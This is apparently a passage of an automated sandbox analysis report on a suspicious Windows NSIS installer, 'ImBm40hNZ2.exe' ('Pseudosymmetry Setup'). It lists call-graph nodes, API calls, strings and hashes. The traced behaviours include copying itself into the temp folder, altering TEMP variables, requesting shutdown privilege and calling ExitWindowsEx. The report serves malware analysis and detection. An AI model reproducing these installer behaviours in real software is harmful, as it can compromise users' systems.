5024->5025 5026 401eb3 5025->5026 5027 405e95 2 API calls 5026->5027 5028 401eb9 5027->5028 5030 401ecb 5028->5030 5031 405aef wsprintfA 5028->5031 5031->5030 5032 4039ac 5033 4039c4 5032->5033 5034 403aff 5032->5034 5033->5034 5035 4039d0 5033->5035 5036 403b10 GetDlgItem GetDlgItem 5034->5036 5037 403b50 5034->5037 5039 4039db SetWindowPos 5035->5039 5040 4039ee 5035->5040 5041 403e7f 19 API calls 5036->5041 5038 403baa 5037->5038 5046 401389 2 API calls 5037->5046 5042 403ecb SendMessageA 5038->5042 5047 403afa 5038->5047 5039->5040 5043 4039f3 ShowWindow 5040->5043 5044 403a0b 5040->5044 5045 403b3a SetClassLongA 5041->5045 5070 403bbc 5042->5070 5043->5044 5048 403a13 DestroyWindow 5044->5048 5049 403a2d 5044->5049 5050 40140b 2 API calls 5045->5050 5051 403b82 5046->5051 5052 403e08 5048->5052 5053 403a32 SetWindowLongA 5049->5053 5054 403a43 5049->5054 5050->5037 5051->5038 5057 403b86 SendMessageA 5051->5057 5052->5047 5063 403e39 ShowWindow 5052->5063 5053->5047 5055 403aba 5054->5055 5056 403a4f GetDlgItem 5054->5056 5062 403ee6 8 API calls 5055->5062 5060 403a62 SendMessageA IsWindowEnabled 5056->5060 5061 403a7f 5056->5061 5057->5047 5058 40140b 2 API calls 5058->5070 5059 403e0a DestroyWindow EndDialog 5059->5052 5060->5047 5060->5061 5065 403a8c 5061->5065 5067 403ad3 SendMessageA 5061->5067 5068 403a9f 5061->5068 5075 403a84 5061->5075 5062->5047 5063->5047 5064 405bb3 18 API calls 5064->5070 5065->5067 5065->5075 5066 403e7f 19 API calls 5066->5070 5067->5055 5071 403aa7 5068->5071 5072 403abc 5068->5072 5070->5047 5070->5058 5070->5059 5070->5064 5070->5066 5076 403e7f 19 API calls 5070->5076 5091 403d4a DestroyWindow 5070->5091 5074 40140b 2 API calls 5071->5074 5073 40140b 2 API calls 5072->5073 5073->5075 5074->5075 5075->5055 5100 403e58 5075->5100 5077 403c37 GetDlgItem 5076->5077 5078 403c54 ShowWindow EnableWindow 5077->5078 5079 403c4c 5077->5079 5103 403ea1 EnableWindow 5078->5103 5079->5078 5081 403c7e EnableWindow 5084 403c92 5081->5084 5082 403c97 GetSystemMenu EnableMenuItem SendMessageA 5083 403cc7 SendMessageA 5082->5083 5082->5084 5083->5084 5084->5082 5104 403eb4 SendMessageA 5084->5104 5105 405b91 lstrcpynA 5084->5105 5087 403cf5 lstrlenA 5088 405bb3 18 API calls 5087->5088 5089 403d06 SetWindowTextA 5088->5089 5090 401389 2 API calls 5089->5090 5090->5070 5091->5052 5092 403d64 CreateDialogParamA 5091->5092 5092->5052 5093 403d97 5092->5093 5094 403e7f 19 API calls 5093->5094 5095 403da2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5094->5095 5096 401389 2 API calls 5095->5096 5097 403de8 5096->5097 5097->5047 5098 403df0 ShowWindow 5097->5098 5099 403ecb SendMessageA 5098->5099 5099->5052 5101 403e65 SendMessageA 5100->5101 5102 403e5f 5100->5102 5101->5055 5102->5101 5103->5081 5104->5084 5105->5087 5106 40192d 5107 4029fd 18 API calls 5106->5107 5108 401934 lstrlenA 5107->5108 5109 4024cb 5108->5109 5110 4024af 5111 4029fd 18 API calls 5110->5111 5112 4024b6 5111->5112 5115 405822 GetFileAttributesA CreateFileA 5112->5115 5114 4024c2 5115->5114 5116 401cb0 5117 4029e0 18 API calls 5116->5117 5118 401cc0 SetWindowLongA 5117->5118 5119 402892 5118->5119 5120 401a31 5121 4029e0 18 API calls 5120->5121 5122 401a37 5121->5122 5123 4029e0 18 API calls 5122->5123 5124 4019e1 5123->5124 5125 401e32 5126 4029fd 18 API calls 5125->5126 5127 401e38 5126->5127 5128 404e7c 25 API calls 5127->5128 5129 401e42 5128->5129 5130 405344 2 API calls 5129->5130 5131 401e48 5130->5131 5132 402663 5131->5132 5133 401e9e CloseHandle 5131->5133 5134 401e67 WaitForSingleObject 5131->5134 5138 405ef5 2 API calls 5131->5138 5133->5132 5134->5131 5135 401e75 GetExitCodeProcess 5134->5135 5136 401e90 5135->5136 5137 401e87 5135->5137 5136->5133 5140 405aef wsprintfA 5137->5140 5138->5134 5140->5136 4390 4015b3 4391 4029fd 18 API calls 4390->4391 4392 4015ba 4391->4392 4393 4056ba 4 API calls 4392->4393 4400 4015c2 4393->4400 4394 40160a 4396 401638 4394->4396 4397 40160f 4394->4397 4395 40564c CharNextA 4398 4015d0 CreateDirectoryA 4395->4398 4402 401423 25 API calls 4396->4402 4399 401423 25 API calls 4397->4399 4398->4400 4401 4015e5 GetLastError 4398->4401 4403 401616 4399->4403 4400->4394 4400->4395 4401->4400 4404 4015f2 GetFileAttributesA 4401->4404 4407 401630 4402->4407 4408 405b91 lstrcpynA 4403->4408 4404->4400 4406 401621 SetCurrentDirectoryA 4406->4407 4408->4406 4418 402036 4419 4029fd 18 API calls 4418->4419 4420 40203d 4419->4420 4421 4029fd 18 API calls 4420->4421 4422 402047 4421->4422 4423 4029fd 18 API calls 4422->4423 4424 402051 4423->4424 4425 4029fd 18 API calls 4424->4425 4426 40205b 4425->4426 4427 4029fd 18 API calls 4426->4427 4428 402064 4427->4428 4429 40207a CoCreateInstance 4428->4429 4430 4029fd 18 API calls 4428->4430 4433 402099 4429->4433 4435 40214d 4429->4435 4430->4429 4431 401423 25 API calls 4432 402181 4431->4432 4434 40212f MultiByteToWideChar 4433->4434 4433->4435 4434->4435 4435->4431 4435->4432 5141 4014b7 5142 4014bd 5141->5142 5143 401389 2 API calls 5142->5143 5144 4014c5 5143->5144 4442 401bb8 4443 4029e0 18 API calls 4442->4443 4444 401bbf 4443->4444 4445 4029e0 18 API calls 4444->4445 4446 401bc9 4445->4446 4447 401bd9 4446->4447 4448 4029fd 18 API calls 4446->4448 4449 4029fd 18 API calls 4447->4449 4453 401be9 4447->4453 4448->4447 4449->4453 4450 401bf4 4454 4029e0 18 API calls 4450->4454 4451 401c38 4452 4029fd 18 API calls 4451->4452 4456 401c3d 4452->4456 4453->4450 4453->4451 4455 401bf9 4454->4455 4457 4029e0 18 API calls 4455->4457 4458 4029fd 18 API calls 4456->4458 4459 401c02 4457->4459 4460 401c46 FindWindowExA 4458->4460 4461 401c28 SendMessageA 4459->4461 4462 401c0a SendMessageTimeoutA 4459->4462 4463 401c64 4460->4463 4461->4463 4462->4463 5145 10002179 5146 100021de 5145->5146 5148 10002214 5145->5148 5147 100021f0 GlobalAlloc 5146->5147 5146->5148 5147->5146 4474 40243a 4475 402b07 19 API calls 4474->4475 4476 402444 4475->4476 4477 4029e0 18 API calls 4476->4477 4478 40244d 4477->4478 4479 402470 RegEnumValueA 4478->4479 4480 402464 RegEnumKeyA 4478->4480 4482 402663 4478->4482 4481 402489 RegCloseKey 4479->4481 4479->4482 4480->4481 4481->4482 5149 404fba 5150 405167 5149->5150 5151 404fdc GetDlgItem GetDlgItem GetDlgItem 5149->5151 5153 405197 5150->5153 5154 40516f GetDlgItem CreateThread CloseHandle 5150->5154 5194 403eb4 SendMessageA 5151->5194 5156 4051c5 5153->5156 5157 4051e6 5153->5157 5158 4051ad ShowWindow ShowWindow 5153->5158 5154->5153 5155 40504d 5159 405054 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5155->5159 5160 405220 5156->5160 5162 4051d5 5156->5162 5163 4051f9 ShowWindow 5156->5163 5164 403ee6 8 API calls 5157->5164 5196 403eb4 SendMessageA 5158->5196 5165 4050c3 5159->5165 5166 4050a7 SendMessageA SendMessageA 5159->5166 5160->5157 5167 40522d SendMessageA 5160->5167 5168 403e58 SendMessageA 5162->5168 5170 405219 5163->5170 5171 40520b 5163->5171 5169 4051f2 5164->5169 5174 4050d6 5165->5174 5175 4050c8 SendMessageA 5165->5175 5166->5165 5167->5169 5176 405246 CreatePopupMenu 5167->5176 5168->5157 5173 403e58 SendMessageA 5170->5173 5172 404e7c 25 API calls 5171->5172 5172->5170 5173->5160 5178 403e7f 19 API calls 5174->5178 5175->5174 5177 405bb3 18 API calls 5176->5177 5179 405256 AppendMenuA 5177->5179 5180 4050e6 5178->5180 5181 405274 GetWindowRect 5179->5181 5182 405287 TrackPopupMenu 5179->5182 5183 405123 GetDlgItem SendMessageA 5180->5183 5184 4050ef ShowWindow 5180->5184 5181->5182 5182->5169 5186 4052a3 5182->5186 5183->5169 5185 40514a SendMessageA SendMessageA 5183->5185 5187 405112 5184->5187 5188 405105 ShowWindow 5184->5188 5185->5169 5189 4052c2 SendMessageA 5186->5189 5195 403eb4 SendMessageA 5187->5195 5188->5187 5189->5189 5190 4052df OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5189->5190 5192 405301 SendMessageA 5190->5192 5192->5192 5193 405323 GlobalUnlock SetClipboardData CloseClipboard 5192->5193 5193->5169 5194->5155 5195->5183 5196->5156 5197 40223b 5198 402243 5197->5198 5203 402249 5197->5203 5200 4029fd 18 API calls 5198->5200 5199 402259 5202 402267 5199->5202 5204 4029fd 18 API calls 5199->5204 5200->5203 5201 4029fd 18 API calls 5201->5199 5205 4029fd 18 API calls 5202->5205 5203->5199 5203->5201 5204->5202 5206 402270 WritePrivateProfileStringA 5205->5206 5207 4042bd 5208 4042e9 5207->5208 5209 4042fa 5207->5209 5268 405389 GetDlgItemTextA 5208->5268 5211 404306 GetDlgItem 5209->5211 5217 404365 5209->5217 5213 40431a 5211->5213 5212 4042f4 5215 405dfc 5 API calls 5212->5215 5216 40432e SetWindowTextA 5213->5216 5223 4056ba 4 API calls 5213->5223 5214 404449 5266 4045e4 5214->5266 5270 405389 GetDlgItemTextA 5214->5270 5215->5209 5219 403e7f 19 API calls 5216->5219 5217->5214 5220 405bb3 18 API calls 5217->5220 5217->5266 5224 40434a 5219->5224 5225 4043d9 SHBrowseForFolderA 5220->5225 5221 404479 5226 40570f 18 API calls 5221->5226 5222 403ee6 8 API calls 5227 4045f8 5222->5227 5228 404324 5223->5228 5229 403e7f 19 API calls 5224->5229 5225->5214 5230 4043f1 CoTaskMemFree 5225->5230 5231 40447f 5226->5231 5228->5216 5234 405621 3 API calls 5228->5234 5232 404358 5229->5232 5233 405621 3 API calls 5230->5233 5271 405b91 lstrcpynA 5231->5271 5269 403eb4 SendMessageA 5232->5269 5236 4043fe 5233->5236 5234->5216 5239 404435 SetDlgItemTextA 5236->5239 5243 405bb3 18 API calls 5236->5243 5238 40435e 5241 405ebc 3 API calls 5238->5241 5239->5214 5240 404496 5242 405ebc 3 API calls 5240->5242 5241->5217 5244 40449e 5242->5244 5245 40441d lstrcmpiA 5243->5245 5246 4044d8 5244->5246 5253 405668 2 API calls 5244->5253 5255 404529 5244->5255 5245->5239 5248 40442e lstrcatA 5245->5248 5272 405b91 lstrcpynA 5246->5272 5248->5239 5249 4044df 5250 4056ba 4 API calls 5249->5250 5251 4044e5 GetDiskFreeSpaceA 5250->5251 5254 404507 MulDiv 5251->5254 5251->5255 5253->5244 5254->5255 5256 404593 5255->5256 5257 404665 21 API calls 5255->5257 5258 4045b6 5256->5258 5260 40140b 2 API calls 5256->5260 5259 404585 5257->5259 5273 403ea1 EnableWindow 5258->5273 5262 404595 SetDlgItemTextA 5259->5262 5263 40458a 5259->5263 5260->5258 5262->5256 5265 404665 21 API calls 5263->5265 5264 4045d2 5264->5266 5267 404252 SendMessageA 5264->5267 5265->5256 5266->5222 5267->5266 5268->5212 5269->5238 5270->5221 5271->5240 5272->5249 5273->5264 4501 40173f 4502 4029fd 18 API calls 4501->4502 4503 401746 4502->4503 4504 401764 4503->4504 4505 40176c 4503->4505 4541 405b91 lstrcpynA 4504->4541 4542 405b91 lstrcpynA 4505->4542 4508 40176a 4512 405dfc 5 API calls 4508->4512 4509 401777 4510 405621 3 API calls 4509->4510 4511 40177d lstrcatA 4510->4511 4511->4508 4517 401789 4512->4517 4513 4017ca 4515 4057fd 2 API calls 4513->4515 4514 405e95 2 API calls 4514->4517 4515->4517 4517->4513 4517->4514 4518 4017a0 CompareFileTime 4517->4518 4519 401864 4517->4519 4520 40183b 4517->4520 4523 405b91 lstrcpynA 4517->4523 4529 405bb3 18 API calls 4517->4529 4535 4053a5 MessageBoxIndirectA 4517->4535 4540 405822 GetFileAttributesA CreateFileA 4517->4540 4518->4517 4521 404e7c 25 API calls 4519->4521 4522 404e7c 25 API calls 4520->4522 4539 401850 4520->4539 4524 40186e 4521->4524 4522->4539 4523->4517 4525 402e62 33 API calls 4524->4525 4526 401881 4525->4526 4527 401895 SetFileTime 4526->4527 4528 4018a7 CloseHandle 4526->4528 4527->4528 4530 4018b8 4528->4530 4528->4539 4529->4517 4531 4018d0 4530->4531 4532 4018bd 4530->4532 4534 405bb3 18 API calls 4531->4534 4533 405bb3 18 API calls 4532->4533 4536 4018c5 lstrcatA 4533->4536 4537 4018d8 4534->4537 4535->4517 4536->4537 4538 4053a5 MessageBoxIndirectA 4537->4538 4538->4539 4540->4517 4541->4508 4542->4509 5274 40163f 5275 4029fd 18 API calls 5274->5275 5276 401645 5275->5276 5277 405e95 2 API calls 5276->5277 5278 40164b 5277->5278 5279 40193f 5280 4029e0 18 API calls 5279->5280 5281 401946 5280->5281 5282 4029e0 18 API calls 5281->5282 5283 401950 5282->5283 5284 4029fd 18 API calls 5283->5284 5285 401959 5284->5285 5286 40196c lstrlenA 5285->5286 5287 4019a7 5285->5287 5288 401976 5286->5288 5288->5287 5292 405b91 lstrcpynA 5288->5292 5290 401990 5290->5287 5291 40199d lstrlenA 5290->5291 5291->5287 5292->5290

                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                Function 004030E2 Relevance: 77.3, APIs: 27, Strings: 17, Instructions: 324stringfilecomCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 0 4030e2-403179 #17 SetErrorMode OleInitialize call 405ebc SHGetFileInfoA call 405b91 GetCommandLineA call 405b91 GetModuleHandleA 7 403185-40319a call 40564c CharNextA 0->7 8 40317b-403180 0->8 11 40325f-403263 7->11 8->7 12 403269 11->12 13 40319f-4031a2 11->13 14 40327c-403296 GetTempPathA call 4030ae 12->14 15 4031a4-4031a8 13->15 16 4031aa-4031b2 13->16 25 403298-4032b6 GetWindowsDirectoryA lstrcatA call 4030ae 14->25 26 4032ee-403308 DeleteFileA call 402c29 14->26 15->15 15->16 17 4031b4-4031b5 16->17 18 4031ba-4031bd 16->18 17->18 20 4031c3-4031c7 18->20 21 40324f-40325c call 40564c 18->21 23 4031c9-4031cf 20->23 24 4031df-40320c 20->24 21->11 40 40325e 21->40 28 4031d1-4031d3 23->28 29 4031d5 23->29 30 40320e-403214 24->30 31 40321f-40324d 24->31 25->26 42 4032b8-4032e8 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030ae 25->42 43 40339c-4033ab call 403540 OleUninitialize 26->43 44 40330e-403314 26->44 28->24 28->29 29->24 35 403216-403218 30->35 36 40321a 30->36 31->21 38 40326b-403277 call 405b91 31->38 35->31 35->36 36->31 38->14 40->11 42->26 42->43 55 4033b1-4033c1 call 4053a5 ExitProcess 43->55 56 4034a5-4034ab 43->56 45 403316-403321 call 40564c 44->45 46 40338c-403393 call 40361a 44->46 59 403323-40334c 45->59 60 403357-403361 45->60 53 403398 46->53 53->43 57 403528-403530 56->57 58 4034ad-4034ca call 405ebc * 3 56->58 63 403532 57->63 64 403536-40353a ExitProcess 57->64 88 403514-40351f ExitWindowsEx 58->88 89 4034cc-4034ce 58->89 65 40334e-403350 59->65 66 403363-403370 call 40570f 60->66 67 4033c7-4033e1 lstrcatA lstrcmpiA 60->67 63->64 65->60 70 403352-403355 65->70 66->43 78 403372-403388 call 405b91 * 2 66->78 67->43 72 4033e3-4033f8 CreateDirectoryA SetCurrentDirectoryA 67->72 70->60 70->65 75 403405-40342d call 405b91 72->75 76 4033fa-403400 call 405b91 72->76 86 403433-40344f call 405bb3 DeleteFileA 75->86 76->75 78->46 95 403490-403497 86->95 96 403451-403461 CopyFileA 86->96 88->57 92 403521-403523 call 40140b 88->92 89->88 93 4034d0-4034d2 89->93 92->57 93->88 98 4034d4-4034e6 GetCurrentProcess 93->98 95->86 100 403499-4034a0 call 405a45 95->100 96->95 99 403463-403483 call 405a45 call 405bb3 call 405344 96->99 98->88 105 4034e8-40350a 98->105 99->95 112 403485-40348c CloseHandle 99->112 100->43 105->88 112->95
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • #17.COMCTL32 ref: 00403103
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 0040310E
                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00403115
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: GetModuleHandleA.KERNEL32(?,?,?,00403127,00000008), ref: 00405ECE
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: LoadLibraryA.KERNELBASE(?,?,?,00403127,00000008), ref: 00405ED9
                                                                                                                                                                                                                                                                  • Part of subcall function 00405EBC: GetProcAddress.KERNEL32(00000000,?), ref: 00405EEA
                                                                                                                                                                                                                                                                • SHGetFileInfoA.SHELL32(004287E0,00000000,?,00000160,00000000,00000008), ref: 0040313D
                                                                                                                                                                                                                                                                  • Part of subcall function 00405B91: lstrcpynA.KERNEL32(?,?,00000400,00403152,Pseudosymmetry Setup,NSIS Error), ref: 00405B9E
                                                                                                                                                                                                                                                                • GetCommandLineA.KERNEL32(Pseudosymmetry Setup,NSIS Error), ref: 00403152
                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\ImBm40hNZ2.exe",00000000), ref: 00403165
                                                                                                                                                                                                                                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\ImBm40hNZ2.exe",00000020), ref: 00403190
                                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040328D
                                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040329E
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032AA
                                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032BE
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004032C6
                                                                                                                                                                                                                                                                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004032D7
                                                                                                                                                                                                                                                                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004032DF
                                                                                                                                                                                                                                                                • DeleteFileA.KERNELBASE(1033), ref: 004032F3
                                                                                                                                                                                                                                                                • OleUninitialize.OLE32(?), ref: 004033A1
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 004033C1
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ImBm40hNZ2.exe",00000000,?), ref: 004033CD
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033D9
                                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004033E5
                                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004033EC
                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(004283E0,004283E0,?,0042F000,?), ref: 00403445
                                                                                                                                                                                                                                                                • CopyFileA.KERNEL32(C:\Users\user\Desktop\ImBm40hNZ2.exe,004283E0,00000001), ref: 00403459
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,004283E0,004283E0,?,004283E0,00000000), ref: 00403486
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,?), ref: 004034DB
                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403517
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040353A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                • String ID: "$"C:\Users\user\Desktop\ImBm40hNZ2.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens$C:\Users\user\AppData\Local\Temp\Pindebrndes\normalitetens\Sweatsuit$C:\Users\user\Desktop$C:\Users\user\Desktop\ImBm40hNZ2.exe$Error launching installer$Low$NSIS Error$Pseudosymmetry Setup$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                • API String ID: 4107622049-1958357343
                                                                                                                                                                                                                                                                • Opcode ID: f7f8c4b5207d4c3c8d39ea3bc59535be28d645db3faf0da6b649b370cd1685cb
                                                                                                                                                                                                                                                                • Instruction ID: ab5bd0cb9fd354075505a922324eb5159d0c68426fb539e9448df04d541e8703
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f7f8c4b5207d4c3c8d39ea3bc59535be28d645db3faf0da6b649b370cd1685cb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FB105706082416AE7216F659D8DA2B7EA8AB45306F04047FF581B62E3C77C9E05CB6E
                                                                                                                                                                                                                                                                Function 00405BB3 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 251 405bb3-405bbe 252 405bc0-405bcf 251->252 253 405bd1-405be6 251->253 252->253 254 405dd9-405ddd 253->254 255 405bec-405bf7 253->255 257 405de3-405ded 254->257 258 405c09-405c13 254->258 255->254 256 405bfd-405c04 255->256 256->254 260 405df8-405df9 257->260 261 405def-405df3 call 405b91 257->261 258->257 259 405c19-405c20 258->259 262 405c26-405c5b 259->262 263 405dcc 259->263 261->260 265 405c61-405c6c GetVersion 262->265 266 405d76-405d79 262->266 267 405dd6-405dd8 263->267 268 405dce-405dd4 263->268 269 405c86 265->269 270 405c6e-405c72 265->270 271 405da9-405dac 266->271 272 405d7b-405d7e 266->272 267->254 268->254 278 405c8d-405c94 269->278 270->269 275 405c74-405c78 270->275 273 405dba-405dca lstrlenA 271->273 274 405dae-405db5 call 405bb3 271->274 276 405d80-405d8c call 405aef 272->276 277 405d8e-405d9a call 405b91 272->277 273->254 274->273 275->269 280 405c7a-405c7e 275->280 289 405d9f-405da5 276->289 277->289 282 405c96-405c98 278->282 283 405c99-405c9b 278->283 280->269 285 405c80-405c84 280->285 282->283 287 405cd4-405cd7 283->287 288 405c9d-405cb8 call 405a78 283->288 285->278 292 405ce7-405cea 287->292 293 405cd9-405ce5 GetSystemDirectoryA 287->293 294 405cbd-405cc0 288->294 289->273 291 405da7 289->291 295 405d6e-405d74 call 405dfc 291->295 297 405d54-405d56 292->297 298 405cec-405cfa GetWindowsDirectoryA 292->298 296 405d58-405d5b 293->296 299 405cc6-405ccf call 405bb3 294->299 300 405d5d-405d61 294->300 295->273 296->295 296->300 297->296 301 405cfc-405d06 297->301 298->297 299->296 300->295 304 405d63-405d69 lstrcatA 300->304 306 405d20-405d36 SHGetSpecialFolderLocation 301->306 307 405d08-405d0b 301->307 304->295 310 405d51 306->310 311 405d38-405d4f SHGetPathFromIDListA CoTaskMemFree 306->311 307->306 309 405d0d-405d14 307->309 312 405d1c-405d1e 309->312 310->297 311->296 311->310 312->296 312->306
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00429000,00000000,00404EB4,00429000,00000000), ref: 00405C64
                                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405CDF
                                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CF2
                                                                                                                                                                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,0041AFD0), ref: 00405D2E
                                                                                                                                                                                                                                                                • SHGetPathFromIDListA.SHELL32(0041AFD0,Call), ref: 00405D3C
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(0041AFD0), ref: 00405D47
                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D69
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(Call,?,00429000,00000000,00404EB4,00429000,00000000), ref: 00405DBB
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.16986239509.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986169395.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986311657.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986382385.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.16986713463.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_ImBm40hNZ2.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                                                                                                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$XRS$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                • API String ID: 900638850-2713732727
                                                                                                                                                                                                                                                                • Opcode ID: 1bfbfe599053c74d70d9056e629d07aaf569f56c231d7efdbf006e697ef1feef
                                                                                                                                                                                                                                                                • Instruction ID: 03bbcc83ae8db2cba80ea7df372ba0a8a6f53f324bd5ae32260a6f1a1bd8d9a5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bfbfe599053c74d70d9056e629d07aaf569f56c231d7efdbf006e697ef1feef
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E61F271A04A05AEEF215B65CC88BBF3BA5DF11704F20813BE901B62D1D27D5882DF5E
                                                                                                                                                                                                                                                                Function 00405451 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

